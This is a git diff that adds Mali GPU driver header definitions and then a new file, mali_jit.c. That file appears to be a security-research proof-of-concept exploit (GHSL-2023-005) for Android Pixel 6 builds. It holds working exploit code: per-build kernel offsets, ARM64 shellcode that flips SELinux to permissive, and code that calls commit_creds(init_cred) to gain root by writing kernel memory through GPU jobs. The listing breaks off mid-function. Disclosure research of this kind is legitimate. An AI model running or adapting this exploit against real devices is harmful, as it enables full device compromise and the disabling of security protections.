BASE_JD_SW_EVENT_JOB = (0u << 11), /* Job related event */ + BASE_JD_SW_EVENT_BAG = (1u << 11), /* Bag related event */ + BASE_JD_SW_EVENT_INFO = (2u << 11), /* Misc/info event */ + BASE_JD_SW_EVENT_RESERVED = (3u << 11), /* Reserved event type */ + /* Mask to extract the type from an event code */ + BASE_JD_SW_EVENT_TYPE_MASK = (3u << 11) +}; + +/** + * enum base_jd_event_code - Job chain event codes + * + * @BASE_JD_EVENT_RANGE_HW_NONFAULT_START: Start of hardware non-fault status + * codes. + * Obscurely, BASE_JD_EVENT_TERMINATED + * indicates a real fault, because the + * job was hard-stopped. + * @BASE_JD_EVENT_NOT_STARTED: Can't be seen by userspace, treated as + * 'previous job done'. + * @BASE_JD_EVENT_STOPPED: Can't be seen by userspace, becomes + * TERMINATED, DONE or JOB_CANCELLED. + * @BASE_JD_EVENT_TERMINATED: This is actually a fault status code - the job + * was hard stopped. + * @BASE_JD_EVENT_ACTIVE: Can't be seen by userspace, jobs only returned on + * complete/fail/cancel. + * @BASE_JD_EVENT_RANGE_HW_NONFAULT_END: End of hardware non-fault status codes. + * Obscurely, BASE_JD_EVENT_TERMINATED + * indicates a real fault, + * because the job was hard-stopped. + * @BASE_JD_EVENT_RANGE_HW_FAULT_OR_SW_ERROR_START: Start of hardware fault and + * software error status codes. + * @BASE_JD_EVENT_RANGE_HW_FAULT_OR_SW_ERROR_END: End of hardware fault and + * software error status codes. + * @BASE_JD_EVENT_RANGE_SW_SUCCESS_START: Start of software success status + * codes. + * @BASE_JD_EVENT_RANGE_SW_SUCCESS_END: End of software success status codes. + * @BASE_JD_EVENT_RANGE_KERNEL_ONLY_START: Start of kernel-only status codes. + * Such codes are never returned to + * user-space. + * @BASE_JD_EVENT_RANGE_KERNEL_ONLY_END: End of kernel-only status codes. + * @BASE_JD_EVENT_DONE: atom has completed successfull + * @BASE_JD_EVENT_JOB_CONFIG_FAULT: Atom dependencies configuration error which + * shall result in a failed atom + * @BASE_JD_EVENT_JOB_POWER_FAULT: The job could not be executed because the + * part of the memory system required to access + * job descriptors was not powered on + * @BASE_JD_EVENT_JOB_READ_FAULT: Reading a job descriptor into the Job + * manager failed + * @BASE_JD_EVENT_JOB_WRITE_FAULT: Writing a job descriptor from the Job + * manager failed + * @BASE_JD_EVENT_JOB_AFFINITY_FAULT: The job could not be executed because the + * specified affinity mask does not intersect + * any available cores + * @BASE_JD_EVENT_JOB_BUS_FAULT: A bus access failed while executing a job + * @BASE_JD_EVENT_INSTR_INVALID_PC: A shader instruction with an illegal program + * counter was executed. + * @BASE_JD_EVENT_INSTR_INVALID_ENC: A shader instruction with an illegal + * encoding was executed. + * @BASE_JD_EVENT_INSTR_TYPE_MISMATCH: A shader instruction was executed where + * the instruction encoding did not match the + * instruction type encoded in the program + * counter. + * @BASE_JD_EVENT_INSTR_OPERAND_FAULT: A shader instruction was executed that + * contained invalid combinations of operands. + * @BASE_JD_EVENT_INSTR_TLS_FAULT: A shader instruction was executed that tried + * to access the thread local storage section + * of another thread. + * @BASE_JD_EVENT_INSTR_ALIGN_FAULT: A shader instruction was executed that + * tried to do an unsupported unaligned memory + * access. + * @BASE_JD_EVENT_INSTR_BARRIER_FAULT: A shader instruction was executed that + * failed to complete an instruction barrier. + * @BASE_JD_EVENT_DATA_INVALID_FAULT: Any data structure read as part of the job + * contains invalid combinations of data. + * @BASE_JD_EVENT_TILE_RANGE_FAULT: Tile or fragment shading was asked to + * process a tile that is entirely outside the + * bounding box of the frame. + * @BASE_JD_EVENT_STATE_FAULT: Matches ADDR_RANGE_FAULT. A virtual address + * has been found that exceeds the virtual + * address range. + * @BASE_JD_EVENT_OUT_OF_MEMORY: The tiler ran out of memory when executing a job. + * @BASE_JD_EVENT_UNKNOWN: If multiple jobs in a job chain fail, only + * the first one the reports an error will set + * and return full error information. + * Subsequent failing jobs will not update the + * error status registers, and may write an + * error status of UNKNOWN. + * @BASE_JD_EVENT_DELAYED_BUS_FAULT: The GPU received a bus fault for access to + * physical memory where the original virtual + * address is no longer available. + * @BASE_JD_EVENT_SHAREABILITY_FAULT: Matches GPU_SHAREABILITY_FAULT. A cache + * has detected that the same line has been + * accessed as both shareable and non-shareable + * memory from inside the GPU. + * @BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL1: A memory access hit an invalid table + * entry at level 1 of the translation table. + * @BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL2: A memory access hit an invalid table + * entry at level 2 of the translation table. + * @BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL3: A memory access hit an invalid table + * entry at level 3 of the translation table. + * @BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL4: A memory access hit an invalid table + * entry at level 4 of the translation table. + * @BASE_JD_EVENT_PERMISSION_FAULT: A memory access could not be allowed due to + * the permission flags set in translation + * table + * @BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL1: A bus fault occurred while reading + * level 0 of the translation tables. + * @BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL2: A bus fault occurred while reading + * level 1 of the translation tables. + * @BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL3: A bus fault occurred while reading + * level 2 of the translation tables. + * @BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL4: A bus fault occurred while reading + * level 3 of the translation tables. + * @BASE_JD_EVENT_ACCESS_FLAG: Matches ACCESS_FLAG_0. A memory access hit a + * translation table entry with the ACCESS_FLAG + * bit set to zero in level 0 of the + * page table, and the DISABLE_AF_FAULT flag + * was not set. + * @BASE_JD_EVENT_MEM_GROWTH_FAILED: raised for JIT_ALLOC atoms that failed to + * grow memory on demand + * @BASE_JD_EVENT_JOB_CANCELLED: raised when this atom was hard-stopped or its + * dependencies failed + * @BASE_JD_EVENT_JOB_INVALID: raised for many reasons, including invalid data + * in the atom which overlaps with + * BASE_JD_EVENT_JOB_CONFIG_FAULT, or if the + * platform doesn't support the feature specified in + * the atom. + * @BASE_JD_EVENT_PM_EVENT: TODO: remove as it's not used + * @BASE_JD_EVENT_TIMED_OUT: TODO: remove as it's not used + * @BASE_JD_EVENT_BAG_INVALID: TODO: remove as it's not used + * @BASE_JD_EVENT_PROGRESS_REPORT: TODO: remove as it's not used + * @BASE_JD_EVENT_BAG_DONE: TODO: remove as it's not used + * @BASE_JD_EVENT_DRV_TERMINATED: this is a special event generated to indicate + * to userspace that the KBase context has been + * destroyed and Base should stop listening for + * further events + * @BASE_JD_EVENT_REMOVED_FROM_NEXT: raised when an atom that was configured in + * the GPU has to be retried (but it has not + * started) due to e.g., GPU reset + * @BASE_JD_EVENT_END_RP_DONE: this is used for incremental rendering to signal + * the completion of a renderpass. This value + * shouldn't be returned to userspace but I haven't + * seen where it is reset back to JD_EVENT_DONE. + * + * HW and low-level SW events are represented by event codes. + * The status of jobs which succeeded are also represented by + * an event code (see @BASE_JD_EVENT_DONE). + * Events are usually reported as part of a &struct base_jd_event. + * + * The event codes are encoded in the following way: + * * 10:0 - subtype + * * 12:11 - type + * * 13 - SW success (only valid if the SW bit is set) + * * 14 - SW event (HW event if not set) + * * 15 - Kernel event (should never be seen in userspace) + * + * Events are split up into ranges as follows: + * * BASE_JD_EVENT_RANGE__START + * * BASE_JD_EVENT_RANGE__END + * + * code is in 's range when: + * BASE_JD_EVENT_RANGE__START <= code < + * BASE_JD_EVENT_RANGE__END + * + * Ranges can be asserted for adjacency by testing that the END of the previous + * is equal to the START of the next. This is useful for optimizing some tests + * for range. + * + * A limitation is that the last member of this enum must explicitly be handled + * (with an assert-unreachable statement) in switch statements that use + * variables of this type. Otherwise, the compiler warns that we have not + * handled that enum value. + */ +enum base_jd_event_code { + /* HW defined exceptions */ + BASE_JD_EVENT_RANGE_HW_NONFAULT_START = 0, + + /* non-fatal exceptions */ + BASE_JD_EVENT_NOT_STARTED = 0x00, + BASE_JD_EVENT_DONE = 0x01, + BASE_JD_EVENT_STOPPED = 0x03, + BASE_JD_EVENT_TERMINATED = 0x04, + BASE_JD_EVENT_ACTIVE = 0x08, + + BASE_JD_EVENT_RANGE_HW_NONFAULT_END = 0x40, + BASE_JD_EVENT_RANGE_HW_FAULT_OR_SW_ERROR_START = 0x40, + + /* job exceptions */ + BASE_JD_EVENT_JOB_CONFIG_FAULT = 0x40, + BASE_JD_EVENT_JOB_POWER_FAULT = 0x41, + BASE_JD_EVENT_JOB_READ_FAULT = 0x42, + BASE_JD_EVENT_JOB_WRITE_FAULT = 0x43, + BASE_JD_EVENT_JOB_AFFINITY_FAULT = 0x44, + BASE_JD_EVENT_JOB_BUS_FAULT = 0x48, + BASE_JD_EVENT_INSTR_INVALID_PC = 0x50, + BASE_JD_EVENT_INSTR_INVALID_ENC = 0x51, + BASE_JD_EVENT_INSTR_TYPE_MISMATCH = 0x52, + BASE_JD_EVENT_INSTR_OPERAND_FAULT = 0x53, + BASE_JD_EVENT_INSTR_TLS_FAULT = 0x54, + BASE_JD_EVENT_INSTR_BARRIER_FAULT = 0x55, + BASE_JD_EVENT_INSTR_ALIGN_FAULT = 0x56, + BASE_JD_EVENT_DATA_INVALID_FAULT = 0x58, + BASE_JD_EVENT_TILE_RANGE_FAULT = 0x59, + BASE_JD_EVENT_STATE_FAULT = 0x5A, + BASE_JD_EVENT_OUT_OF_MEMORY = 0x60, + BASE_JD_EVENT_UNKNOWN = 0x7F, + + /* GPU exceptions */ + BASE_JD_EVENT_DELAYED_BUS_FAULT = 0x80, + BASE_JD_EVENT_SHAREABILITY_FAULT = 0x88, + + /* MMU exceptions */ + BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL1 = 0xC1, + BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL2 = 0xC2, + BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL3 = 0xC3, + BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL4 = 0xC4, + BASE_JD_EVENT_PERMISSION_FAULT = 0xC8, + BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL1 = 0xD1, + BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL2 = 0xD2, + BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL3 = 0xD3, + BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL4 = 0xD4, + BASE_JD_EVENT_ACCESS_FLAG = 0xD8, + + /* SW defined exceptions */ + BASE_JD_EVENT_MEM_GROWTH_FAILED = + BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_JOB | 0x000, + BASE_JD_EVENT_TIMED_OUT = + BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_JOB | 0x001, + BASE_JD_EVENT_JOB_CANCELLED = + BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_JOB | 0x002, + BASE_JD_EVENT_JOB_INVALID = + BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_JOB | 0x003, + BASE_JD_EVENT_PM_EVENT = + BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_JOB | 0x004, + + BASE_JD_EVENT_BAG_INVALID = + BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_BAG | 0x003, + + BASE_JD_EVENT_RANGE_HW_FAULT_OR_SW_ERROR_END = BASE_JD_SW_EVENT | + BASE_JD_SW_EVENT_RESERVED | 0x3FF, + + BASE_JD_EVENT_RANGE_SW_SUCCESS_START = BASE_JD_SW_EVENT | + BASE_JD_SW_EVENT_SUCCESS | 0x000, + + BASE_JD_EVENT_PROGRESS_REPORT = BASE_JD_SW_EVENT | + BASE_JD_SW_EVENT_SUCCESS | BASE_JD_SW_EVENT_JOB | 0x000, + BASE_JD_EVENT_BAG_DONE = BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_SUCCESS | + BASE_JD_SW_EVENT_BAG | 0x000, + BASE_JD_EVENT_DRV_TERMINATED = BASE_JD_SW_EVENT | + BASE_JD_SW_EVENT_SUCCESS | BASE_JD_SW_EVENT_INFO | 0x000, + + BASE_JD_EVENT_RANGE_SW_SUCCESS_END = BASE_JD_SW_EVENT | + BASE_JD_SW_EVENT_SUCCESS | BASE_JD_SW_EVENT_RESERVED | 0x3FF, + + BASE_JD_EVENT_RANGE_KERNEL_ONLY_START = BASE_JD_SW_EVENT | + BASE_JD_SW_EVENT_KERNEL | 0x000, + BASE_JD_EVENT_REMOVED_FROM_NEXT = BASE_JD_SW_EVENT | + BASE_JD_SW_EVENT_KERNEL | BASE_JD_SW_EVENT_JOB | 0x000, + BASE_JD_EVENT_END_RP_DONE = BASE_JD_SW_EVENT | + BASE_JD_SW_EVENT_KERNEL | BASE_JD_SW_EVENT_JOB | 0x001, + + BASE_JD_EVENT_RANGE_KERNEL_ONLY_END = BASE_JD_SW_EVENT | + BASE_JD_SW_EVENT_KERNEL | BASE_JD_SW_EVENT_RESERVED | 0x3FF +}; + +/** + * struct base_jd_event_v2 - Event reporting structure + * + * @event_code: event code. + * @atom_number: the atom number that has completed. + * @udata: user data. + * + * This structure is used by the kernel driver to report information + * about GPU events. They can either be HW-specific events or low-level + * SW events, such as job-chain completion. + * + * The event code contains an event type field which can be extracted + * by ANDing with BASE_JD_SW_EVENT_TYPE_MASK. + */ +struct base_jd_event_v2 { + enum base_jd_event_code event_code; + base_atom_id atom_number; + struct base_jd_udata udata; +}; + +/** + * struct base_dump_cpu_gpu_counters - Structure for + * BASE_JD_REQ_SOFT_DUMP_CPU_GPU_COUNTERS + * jobs. + * @system_time: gpu timestamp + * @cycle_counter: gpu cycle count + * @sec: cpu time(sec) + * @usec: cpu time(usec) + * @padding: padding + * + * This structure is stored into the memory pointed to by the @jc field + * of &struct base_jd_atom. + * + * It must not occupy the same CPU cache line(s) as any neighboring data. + * This is to avoid cases where access to pages containing the structure + * is shared between cached and un-cached memory regions, which would + * cause memory corruption. + */ + +struct base_dump_cpu_gpu_counters { + __u64 system_time; + __u64 cycle_counter; + __u64 sec; + __u32 usec; + __u8 padding[36]; +}; + +#endif /* _UAPI_BASE_JM_KERNEL_H_ */ + diff --git a/SecurityExploits/Android/Mali/GHSL-2023-005/mali_jit.c b/SecurityExploits/Android/Mali/GHSL-2023-005/mali_jit.c new file mode 100644 index 0000000..ba87406 --- /dev/null +++ b/SecurityExploits/Android/Mali/GHSL-2023-005/mali_jit.c @@ -0,0 +1,659 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include "stdbool.h" +#include +#include +#include + +#include "mali.h" +#include "mali_base_jm_kernel.h" +#include "midgard.h" + +#ifdef SHELL +#define LOG(fmt, ...) printf(fmt, ##__VA_ARGS__) +#else +#include +#define LOG(fmt, ...) __android_log_print(ANDROID_LOG_ERROR, "exploit", fmt, ##__VA_ARGS__) + +#endif //SHELL + +#define MALI "/dev/mali0" + +#define PAGE_SHIFT 12 + +#define PFN_DOWN(x) ((x) >> PAGE_SHIFT) + +#define FREED_NUM 1 + +#define FLUSH_SIZE (0x1000 * 0x1000) + +#define POOL_SIZE 16384 + +#define RESERVED_SIZE 32 + +#define TOTAL_RESERVED_SIZE 1024 + +#define FLUSH_REGION_SIZE 500 + +#define GROW_SIZE 0x2000 + +#define RECLAIM_SIZE (3 * POOL_SIZE) + +#define JIT_PAGES 0x1000000 + +#define JIT_GROUP_ID 1 + +#define KERNEL_BASE 0x80000000 + +#define OVERWRITE_INDEX 256 + +#define ADRP_INIT_INDEX 0 + +#define ADD_INIT_INDEX 1 + +#define ADRP_COMMIT_INDEX 2 + +#define ADD_COMMIT_INDEX 3 + +#define AVC_DENY_2211 0x8d6810 + +#define SEL_READ_ENFORCE_2211 0x8ea124 + +#define INIT_CRED_2211 0x2fd1388 + +#define COMMIT_CREDS_2211 0x17ada4 + +#define ADD_INIT_2211 0x910e2000 //add x0, x0, #0x388 + +#define ADD_COMMIT_2211 0x91369108 //add x8, x8, #0xda4 + +#define AVC_DENY_2212 0x8ba710 + +#define SEL_READ_ENFORCE_2212 0x8cdfd4 + +#define INIT_CRED_2212 0x2fd1418 + +#define COMMIT_CREDS_2212 0x177ee4 + +#define ADD_INIT_2212 0x91106000 //add x0, x0, #0x418 + +#define ADD_COMMIT_2212 0x913b9108 //add x8, x8, #0xee4 + +#define AVC_DENY_2301 0x8ba710 + +#define SEL_READ_ENFORCE_2301 0x8cdfd4 + +#define INIT_CRED_2301 0x2fd1418 + +#define COMMIT_CREDS_2301 0x177ee4 + +#define ADD_INIT_2301 0x91106000 //add x0, x0, #0x418 + +#define ADD_COMMIT_2301 0x913b9108 //add x8, x8, #0xee4 + +static uint64_t sel_read_enforce = SEL_READ_ENFORCE_2301; + +static uint64_t avc_deny = AVC_DENY_2301; + +/* +Overwriting SELinux to permissive + strb wzr, [x0] + mov x0, #0 + ret +*/ +static uint32_t permissive[3] = {0x3900001f, 0xd2800000,0xd65f03c0}; + +static uint32_t root_code[8] = {0}; + +static uint8_t atom_number = 1; +static void* flush_regions[FLUSH_REGION_SIZE]; +static uint64_t reclaim_va[RECLAIM_SIZE]; +static uint64_t reserved[TOTAL_RESERVED_SIZE/RESERVED_SIZE]; +static bool commit_failed = false; +static bool g_ready_commit = false; + +struct base_mem_handle { + struct { + __u64 handle; + } basep; +}; + +struct base_mem_aliasing_info { + struct base_mem_handle handle; + __u64 offset; + __u64 length; +}; + +static int open_dev(char* name) { + int fd = open(name, O_RDWR); + if (fd == -1) { + err(1, "cannot open %s\n", name); + } + return fd; +} + +uint8_t increase_atom_number() { + uint8_t out = atom_number; + if (++atom_number == 0) { + atom_number++; + } + return out; +} + +void setup_mali(int fd, int group_id) { + struct kbase_ioctl_version_check param = {0}; + if (ioctl(fd, KBASE_IOCTL_VERSION_CHECK, ¶m) < 0) { + err(1, "version check failed\n"); + } + struct kbase_ioctl_set_flags set_flags = {group_id << 3}; + if (ioctl(fd, KBASE_IOCTL_SET_FLAGS, &set_flags) < 0) { + err(1, "set flags failed\n"); + } +} + +void* setup_tracking_page(int fd) { + void* region = mmap(NULL, 0x1000, 0, MAP_SHARED, fd, BASE_MEM_MAP_TRACKING_HANDLE); + if (region == MAP_FAILED) { + err(1, "setup tracking page failed"); + } + return region; +} + +void jit_init(int fd, uint64_t va_pages, uint64_t trim_level, int group_id) { + struct kbase_ioctl_mem_jit_init init = {0}; + init.va_pages = va_pages; + init.max_allocations = 255; + init.trim_level = trim_level; + init.group_id = group_id; + init.phys_pages = va_pages; + + if (ioctl(fd, KBASE_IOCTL_MEM_JIT_INIT, &init) < 0) { + err(1, "jit init failed\n"); + } +} + +uint64_t jit_allocate(int fd, uint8_t atom_number, uint8_t id, uint64_t va_pages, uint64_t commit_pages, uint8_t bin_id, uint16_t usage_id, uint64_t gpu_alloc_addr) { + struct base_jit_alloc_info info = {0}; + struct base_jd_atom_v2 atom = {0}; + + info.id = id; + info.gpu_alloc_addr = gpu_alloc_addr; + info.va_pages = va_pages; + info.commit_pages = commit_pages; + info.extension = 0x1000; + info.bin_id = bin_id; + info.usage_id = usage_id; + + atom.jc = (uint64_t)(&info); + atom.atom_number = atom_number; + atom.core_req = BASE_JD_REQ_SOFT_JIT_ALLOC; + atom.nr_extres = 1; + struct kbase_ioctl_job_submit submit = {0}; + submit.addr = (uint64_t)(&atom); + submit.nr_atoms = 1; + submit.stride = sizeof(struct base_jd_atom_v2); + if (ioctl(fd, KBASE_IOCTL_JOB_SUBMIT, &submit) < 0) { + err(1, "submit job failed\n"); + } + return *((uint64_t*)gpu_alloc_addr); +} + +void jit_free(int fd, uint8_t atom_number, uint8_t id) { + uint8_t free_id = id; + + struct base_jd_atom_v2 atom = {0}; + + atom.jc = (uint64_t)(&free_id); + atom.atom_number = atom_number; + atom.core_req = BASE_JD_REQ_SOFT_JIT_FREE; + atom.nr_extres = 1; + struct kbase_ioctl_job_submit submit = {0}; + submit.addr = (uint64_t)(&atom); + submit.nr_atoms = 1; + submit.stride = sizeof(struct base_jd_atom_v2); + if (ioctl(fd, KBASE_IOCTL_JOB_SUBMIT, &submit) < 0) { + err(1, "submit job failed\n"); + } + +} + +void mem_flags_change(int fd, uint64_t gpu_addr, uint32_t flags, int ignore_results) { + struct kbase_ioctl_mem_flags_change change = {0}; + change.flags = flags; + change.gpu_va = gpu_addr; + change.mask = flags; + if (ignore_results) { + ioctl(fd, KBASE_IOCTL_MEM_FLAGS_CHANGE, &change); + return; + } + if (ioctl(fd, KBASE_IOCTL_MEM_FLAGS_CHANGE, &change) < 0) { + err(1, "flags_change failed\n"); + } +} + +void mem_alloc(int fd, union kbase_ioctl_mem_alloc* alloc) { + if (ioctl(fd, KBASE_IOCTL_MEM_ALLOC, alloc) < 0) { + err(1, "mem_alloc failed\n"); + } +} + +void mem_alias(int fd, union kbase_ioctl_mem_alias* alias) { + if (ioctl(fd, KBASE_IOCTL_MEM_ALIAS, alias) < 0) { + err(1, "mem_alias failed\n"); + } +} + +void mem_query(int fd, union kbase_ioctl_mem_query* query) { + if (ioctl(fd, KBASE_IOCTL_MEM_QUERY, query) < 0) { + err(1, "mem_query failed\n"); + } +} + +void mem_commit(int fd, uint64_t gpu_addr, uint64_t pages) { + struct kbase_ioctl_mem_commit commit = {.gpu_addr = gpu_addr, pages = pages}; + if (ioctl(fd, KBASE_IOCTL_MEM_COMMIT, &commit) < 0) { + LOG("commit failed\n"); + commit_failed = true; + } +} + +void* map_gpu(int mali_fd, unsigned int va_pages, unsigned int commit_pages, bool read_only, int group) { + union kbase_ioctl_mem_alloc alloc = {0}; + alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | (group << 22); + int prot = PROT_READ; + if (!read_only) { + alloc.in.flags |= BASE_MEM_PROT_GPU_WR; + prot |= PROT_WRITE; + } + alloc.in.va_pages = va_pages; + alloc.in.commit_pages = commit_pages; + mem_alloc(mali_fd, &alloc); + void* region = mmap(NULL, 0x1000 * va_pages, prot, MAP_SHARED, mali_fd, alloc.out.gpu_va); + if (region == MAP_FAILED) { + err(1, "mmap failed"); + } + return region; +} + +uint64_t alloc_mem(int mali_fd, unsigned int pages) { + union kbase_ioctl_mem_alloc alloc = {0}; + alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR; + int prot = PROT_READ | PROT_WRITE; + alloc.in.va_pages = pages; + alloc.in.commit_pages = pages; + mem_alloc(mali_fd, &alloc); + return alloc.out.gpu_va; +} + +void free_mem(int mali_fd, uint64_t gpuaddr) { + struct kbase_ioctl_mem_free mem_free = {.gpu_addr = gpuaddr}; + if (ioctl(mali_fd, KBASE_IOCTL_MEM_FREE, &mem_free) < 0) { + err(1, "free_mem failed\n"); + } +} + +uint64_t drain_mem_pool(int mali_fd) { + union kbase_ioctl_mem_alloc alloc = {0}; + alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR | (1 << 22); + int prot = PROT_READ | PROT_WRITE; + alloc.in.va_pages = POOL_SIZE; + alloc.in.commit_pages = POOL_SIZE; + mem_alloc(mali_fd, &alloc); + return alloc.out.gpu_va; +} + +void release_mem_pool(int mali_fd, uint64_t drain) { + struct kbase_ioctl_mem_free mem_free = {.gpu_addr = drain}; + if (ioctl(mali_fd, KBASE_IOCTL_MEM_FREE, &mem_free) < 0) { + err(1, "free_mem failed\n"); + } +} + +void* flush(int idx) { + void* region = mmap(NULL, FLUSH_SIZE, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0); + if (region == MAP_FAILED) err(1, "flush failed"); + memset(region, idx, FLUSH_SIZE); + return region; +} + +void reserve_pages(int mali_fd, int pages, int nents, uint64_t* reserved_va) { + for (int i = 0; i < nents; i++) { + union kbase_ioctl_mem_alloc alloc = {0}; + alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR | (1 << 22); + int prot = PROT_READ | PROT_WRITE; + alloc.in.va_pages = pages; + alloc.in.commit_pages = pages; + mem_alloc(mali_fd, &alloc); + reserved_va[i] = alloc.out.gpu_va; + } +} + +void map_reserved(int mali_fd, int pages, int nents, uint64_t* reserved_va) { + for (int i = 0; i < nents; i++) { + void* reserved = mmap(NULL, 0x1000 * pages, PROT_READ | PROT_WRITE, MAP_SHARED, mali_fd, reserved_va[i]); + if (reserved == MAP_FAILED) { + err(1, "mmap reserved failed"); + } + reserved_va[i] = (uint64_t)reserved; + } +} + +uint32_t lo32(uint64_t x) { + return x & 0xffffffff; +} + +uint32_t hi32(uint64_t x) { + return x >> 32; +} + +uint32_t write_adrp(int rd, uint64_t pc, uint64_t label) { + uint64_t pc_page = pc >> 12; + uint64_t label_page = label >> 12; + int64_t offset = (label_page - pc_page) << 12; + int64_t immhi_mask = 0xffffe0; + int64_t immhi = offset >> 14; + int32_t immlo = (offset >> 12) & 0x3; + uint32_t adpr = rd & 0x1f; + adpr |= (1 << 28); + adpr |= (1 << 31); //op + adpr |= immlo << 29; + adpr |= (immhi_mask & (immhi << 5)); + return adpr; +} + +void fixup_root_shell(uint64_t init_cred, uint64_t commit_cred, uint64_t read_enforce, uint32_t add_init, uint32_t add_commit) { + + uint32_t init_adpr = write_adrp(0, read_enforce, init_cred); + //Sets x0 to init_cred + root_code[ADRP_INIT_INDEX] = init_adpr; + root_code[ADD_INIT_INDEX] = add_init; + //Sets x8 to commit_creds + root_code[ADRP_COMMIT_INDEX] = write_adrp(8, read_enforce, commit_cred); + root_code[ADD_COMMIT_INDEX] = add_commit; + root_code[4] = 0xa9bf7bfd; // stp x29, x30, [sp, #-0x10] + root_code[5] = 0xd63f0100; // blr x8 + root_code[6] = 0xa8c17bfd; // ldp x29, x30, [sp], #0x10 + root_code[7] = 0xd65f03c0; // ret +} + +uint64_t set_addr_lv3(uint64_t addr) { + uint64_t pfn = addr >> PAGE_SHIFT; + pfn &= ~ 0x1FFUL; + pfn |= 0x100UL; + return pfn << PAGE_SHIFT; +} + +static inline uint64_t compute_pt_index(uint64_t addr, int level) { + uint64_t vpfn = addr >> PAGE_SHIFT; + vpfn >>= (3 - level) * 9; + return vpfn & 0x1FF; +} + +void write_to(int mali_fd, uint64_t gpu_addr, uint64_t value, int atom_number, enum mali_write_value_type type) { + void* jc_region = map_gpu(mali_fd, 1, 1, false, 0); + struct MALI_JOB_HEADER jh = {0}; + jh.is_64b = true; + jh.type = MALI_JOB_TYPE_WRITE_VALUE; + + struct MALI_WRITE_VALUE_JOB_PAYLOAD payload = {0}; + payload.type = type; + payload.immediate_value = value; + payload.address = gpu_addr; + + MALI_JOB_HEADER_pack((uint32_t*)jc_region, &jh); + MALI_WRITE_VALUE_JOB_PAYLOAD_pack((uint32_t*)jc_region + 8, &payload); + uint32_t* section = (uint32_t*)jc_region; + struct base_jd_atom_v2 atom = {0}; + atom.jc = (uint64_t)jc_region; + atom.atom_number = atom_number; + atom.core_req = BASE_JD_REQ_CS; + struct kbase_ioctl_job_submit submit = {0}; + submit.addr = (uint64_t)(&atom); + submit.nr_atoms = 1; + submit.stride = sizeof(struct base_jd_atom_v2); + if (ioctl(mali_fd, KBASE_IOCTL_JOB_SUBMIT, &submit) < 0) { + err(1, "submit job failed\n"); + } + usleep(10000); +} + +void write_func(int mali_fd, uint64_t func, uint64_t* reserved, uint64_t size, uint32_t* shellcode, uint64_t code_size) { + uint64_t func_offset = (func + KERNEL_BASE) % 0x1000; + uint64_t curr_overwrite_addr = 0; + for (int i = 0; i < size; i++) { + uint64_t base = reserved[i]; + uint64_t end = reserved[i] + RESERVED_SIZE * 0x1000; + uint64_t start_idx = compute_pt_index(base, 3); + uint64_t end_idx = compute_pt_index(end, 3); + for (uint64_t addr = base; addr < end; addr += 0x1000) { + uint64_t overwrite_addr = set_addr_lv3(addr); + if (curr_overwrite_addr != overwrite_addr) { + LOG("overwrite addr : %lx %lx\n", overwrite_addr + func_offset, func_offset); + curr_overwrite_addr = overwrite_addr; + for (int code = code_size - 1; code >= 0; code--) { + write_to(mali_fd, overwrite_addr + func_offset + code * 4, shellcode[code], increase_atom_number(), MALI_WRITE_VALUE_TYPE_IMMEDIATE_32); + } + usleep(300000); + } + } + } +} + +int run_enforce() { + char result = '2'; + sleep(3); + int enforce_fd = open("/sys/fs/selinux/enforce", O_RDONLY); + read(enforce_fd, &result, 1); + close(enforce_fd); + LOG("result %d\n", result); + return result; +} + +void select_offset() { + char fingerprint[256]; + int len = __system_property_get("ro.build.fingerprint", fingerprint); + LOG("fingerprint: %s\n", fingerprint); + if (!strcmp(fingerprint, "google/oriole/oriole:13/TP1A.221105.002/9080065:user/release-keys")) { + avc_deny = AVC_DENY_2211; + sel_read_enforce = SEL_READ_ENFORCE_2211; + fixup_root_shell(INIT_CRED_2211, COMMIT_CREDS_2211, SEL_READ_ENFORCE_2211, ADD_INIT_2211, ADD_COMMIT_2211); + return; + } + if (!strcmp(fingerprint, "google/oriole/oriole:13/TQ1A.221205.011/9244662:user/release-keys")) { + avc_deny = AVC_DENY_2212; + sel_read_enforce = SEL_READ_ENFORCE_2212; + fixup_root_shell(INIT_CRED_2212, COMMIT_CREDS_2212, SEL_READ_ENFORCE_2212, ADD_INIT_2212, ADD_COMMIT_2212); + return; + } + if (!strcmp(fingerprint, "google/oriole/oriole:13/TQ1A.230105.002/9325679:user/release-keys")) { + avc_deny = AVC_DENY_2301; + sel_read_enforce = SEL_READ_ENFORCE_2301; + fixup_root_shell(INIT_CRED_2301, COMMIT_CREDS_2301, SEL_READ_ENFORCE_2301, ADD_INIT_2301, ADD_COMMIT_2301); + return; + } + err(1, "unable to match build id\n"); +} + +void cleanup(int mali_fd, 